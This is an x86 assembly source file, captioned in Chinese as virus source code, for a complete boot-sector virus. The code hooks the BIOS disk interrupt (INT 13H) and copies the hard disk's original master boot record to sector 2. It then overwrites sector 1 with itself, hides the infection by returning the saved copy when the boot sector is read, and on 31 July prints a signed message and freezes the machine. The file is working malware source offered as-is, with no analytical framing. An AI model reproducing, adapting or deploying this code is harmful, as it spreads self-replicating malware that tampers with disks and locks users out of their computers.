bootvirs.asm

一个汇编病毒源代码

	Format	Binary
	include	'int13e.inc'	
	
	org	7C00H
	jmp	begin
	rb	20H
	db	'ZHW '
begin:	
	cli
	xor	ax,ax
	mov	ss,ax
	mov	ax,7C00H
	mov	sp,ax
	sti
	xor	ax,ax
	mov	es,ax
	push	word [es:13H*4]
	pop	word [cs:Old13H]
	push	word [es:13H*4+2]
	pop	word [cs:Old13H+2]
	mov	ah,04H
	int	1AH
	cmp	dl,31H			;Day
	jne	datenot1
	cmp	dh,07H			;Month
	jne	datenot1
	call	printmsg
datenot1:
	push	cs
	pop	ds
	mov	ax,40H
	mov	es,ax
	dec	word [es:13H]
	mov	ax,[es:13H]
	shl	ax,10-4		;(2^10)/(2^4)
	mov	es,ax
	mov	cx,200H		;512 bytes of a sector
	mov	si,7C00H	;The begin offset
	mov	di,0
	cld
	rep	movsb
	mov	ax,es
	sub	ax,7C0H
	push	ax
	push	TheNextCommand
	mov	es,ax
	mov	bx,0
	mov	ds,bx
	mov	word [ds:13H*4],NewInt13H
	mov	word [ds:13H*4+2],ax
	retf
	Old13H	dd	?
TheNextCommand:
	mov	ax,0201H
	mov	cx,2
	mov	dx,80H	
	mov	bx,0
	mov	es,bx
	mov	bx,7C00H
	INT13H
	push	0
	push	7C00H
	retf
NewInt13H:
	cmp	ax,0201H
	je	IsReadSector
	JMP13H
IsReadSector:
	cmp	cx,1
	jne	NotReadSector
	cmp	dx,80H
	jne	NotReadSector
	call	ReadSector
	jne	GotoEnd
	push	cx
	mov	cx,2
	INT13H
	pop	cx
	retf	2
NotReadSector:
	call	ReadSector
	je	Effected
	call	Effect
Effected:
GotoEnd:
	JMP13H
ReadSector:
	pusha
	mov	ax,0201H
	mov	dx,80H
	mov	cx,1
	INT13H		;Use the read buffer as the Old buffer
	cmp	dword [es:bx+20H+2],'ZHW '
	popa
	retn
Effect:
	pusha
	mov	ax,0301H
	mov	dx,80H
	mov	cx,2
	INT13H			;Backup the old boot record
	mov	si,bx
	add	si,1B0H
	push	es
	pop	ds
	push	cs
	pop	es
	mov	di,7C00H+1B0H
	mov	cx,50H
	cld	
	rep	movsb
	mov	si,bx
	add	si,2
	mov	di,7C00H+2
	mov	cx,20H
	cld
	rep	movsb
	mov	ax,0301H
	mov	cx,1
	mov	dx,80H
	push	cs
	pop	es
	mov	bx,7C00H
	INT13H					;Write the Virus to Sector 1
	popa
	retn
printmsg:
	mov	si,msg
	mov	di,80*2*10+30*2
	push	cs
	pop	ds
	mov	ax,0B800H
	mov	es,ax
	mov	ah,0EH
	cld
PrintGoon:
	lodsb
	cmp	al,0
	je	PrintEnd
	mov	ah,1DH
	stosw
	jmp	PrintGoon
PrintEnd:
	jmp	$
	msg		db	"Don't work today.[ZhengHongwen]",0		
	rb 7C00h+512-2-$	;fill up to the boot record signature
	db	55H,0AAH